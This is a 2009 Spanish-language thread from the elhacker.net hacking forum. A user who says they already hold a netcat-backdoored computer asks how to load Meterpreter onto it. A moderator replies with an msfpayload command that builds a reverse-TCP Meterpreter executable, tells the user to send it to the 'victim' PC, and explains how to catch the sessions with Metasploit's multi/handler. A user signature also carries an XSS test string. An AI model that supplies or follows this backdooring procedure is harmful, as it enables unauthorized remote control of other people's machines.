elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Duda con Meterpreter.
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Duda con Meterpreter.  (Leído 6,194 veces)
R007h

Desconectado Desconectado

Mensajes: 109

<script>alert('xss');</script>


Ver Perfil WWW
Duda con Meterpreter.
« en: 29 Diciembre 2009, 19:59 pm »

Hola,

bueno, resulta que tengo un equipo backdooreado con netcat.. que hace un reverseShell a mi maquina...
ahora quiero pasarle el meterpreter xD pero no c como...

puedo usar la conexion que me da netcat para enviar el payload a traves de msf?
o debo generar el payload metsvc y subirlo de algun modo a la maquina remota y despues ejecutarlo? (la maquina remota esta detras de un router asi que supongo que debe ser el windows/metsvc_reverse_tcp)

intenté generar el payload windows/metsvc_reverse_tcp pero... donde rayos queda el payload generado?
es un ejecutable que le puedo pasar a la victima?

Graxias de antemano
Salu2
En línea

<script>alert('xss');</scrip>
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: Duda con Meterpreter.
« Respuesta #1 en: 29 Diciembre 2009, 20:13 pm »

A ver:
  • El Metasploit no funciona con NetCat

  • Podemos BackDoorizar un ejecutable con un PAYLOAD
De está forma:
Código:
./msfpayload [PAYLOAD] [<Parametros del PAYLOAD>] [Parametros de creacion del PAYLOAD X= Ejecutable] > [RUTA_DE_CREACIÓN_DEL_ARCHIVO]


Ejemplo:
Código:
./msfpayload windows/meterpreter/reverse_tcp LHOST=[IP_LOCAL] LPORT=[PUERTO_LOCAL] X > /home/Meterpreter.exe

Ahora tenemos un ejecutable llamado Meterpreter.exe, enviamos esto a P.C Victima. Despues de ello, abrimos el Metasploit y lanzamos el Auxiliar multi/handler. Dentro de está "consola" debemos especificar el PAYLOAD utilizado en el Ejecutable, e ingresar de nuevo el LPORT y LHOST. Ahora estamos listo de ejecutar el Auxiliar multi/handler con el comando exploit y veremos las sessiones del Meterpreter en las P.C Infectadas por el Ejecutable que creamos.

Nota: No sé porque en el PUTO W1nd0w$! no funciona le creación de los PAYLOAD en ejecutables, no funka el parametro X >. Así que creo que tendrias que usar esto dentro de un entorno Linux.
« Última modificación: 29 Diciembre 2009, 20:22 pm por alex19910218 » En línea

Te vendería mi talento por poder dormir tranquilo.
R007h

Desconectado Desconectado

Mensajes: 109

<script>alert('xss');</script>


Ver Perfil WWW
Re: Duda con Meterpreter.
« Respuesta #2 en: 29 Diciembre 2009, 20:46 pm »

grax alex19910218, eso es perfecto..

hey, lo unico que debo hacer en linux es el ejecutable correcto?
luego lo puedo utilizar en un win cierto?

grax..
salu2
En línea

<script>alert('xss');</scrip>
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: Duda con Meterpreter.
« Respuesta #3 en: 29 Diciembre 2009, 20:57 pm »

hey, lo unico que debo hacer en linux es el ejecutable correcto?
luego lo puedo utilizar en un win cierto?
Simon! :P No podes ejecutar el .EXE en Linux :P
En línea

Te vendería mi talento por poder dormir tranquilo.
R007h

Desconectado Desconectado

Mensajes: 109

<script>alert('xss');</script>


Ver Perfil WWW
Re: Duda con Meterpreter.
« Respuesta #4 en: 29 Diciembre 2009, 21:42 pm »

jajja, obvio, no, merefiero a que el uso del multi/handler en msf lo puedo hacer desde win?
En línea

<script>alert('xss');</scrip>
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: Duda con Meterpreter.
« Respuesta #5 en: 29 Diciembre 2009, 21:47 pm »

el uso del multi/handler en msf lo puedo hacer desde win?
Simon!, es el mismo Metasploit! Solo cambia el S.O :P
En línea

Te vendería mi talento por poder dormir tranquilo.
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: Duda con Meterpreter.
« Respuesta #6 en: 30 Diciembre 2009, 02:44 am »

Podes ver un ejemplo aquí http://foro.elhacker.net/hacking_avanzado/metasploit_generando_ejecutable_con_payload-t279407.0.html
En línea

Te vendería mi talento por poder dormir tranquilo.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Comandos Meterpreter
Hacking
Stuxnet 1 6,590 Último mensaje 16 Noviembre 2012, 10:57 am
por el_snupy
Cargar Meterpreter en Metasploit, sin tener Session
Hacking
Jupiter34 5 5,068 Último mensaje 24 Marzo 2013, 10:07 am
por m0rf
BackDoor Meterpreter Reverse TCP (DUDA)
Hacking
ZuriaHack 1 2,973 Último mensaje 16 Enero 2014, 17:17 pm
por Rentero
Duda con funcion portfwd de Meterpreter en Metasploit !!
Hacking
TrashAmbishion 0 2,090 Último mensaje 18 Febrero 2015, 20:11 pm
por TrashAmbishion
Duda con posible infección meterpreter en Windows10
Seguridad
xavi_goma 8 4,153 Último mensaje 13 Febrero 2018, 03:13 am
por AXCESS
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines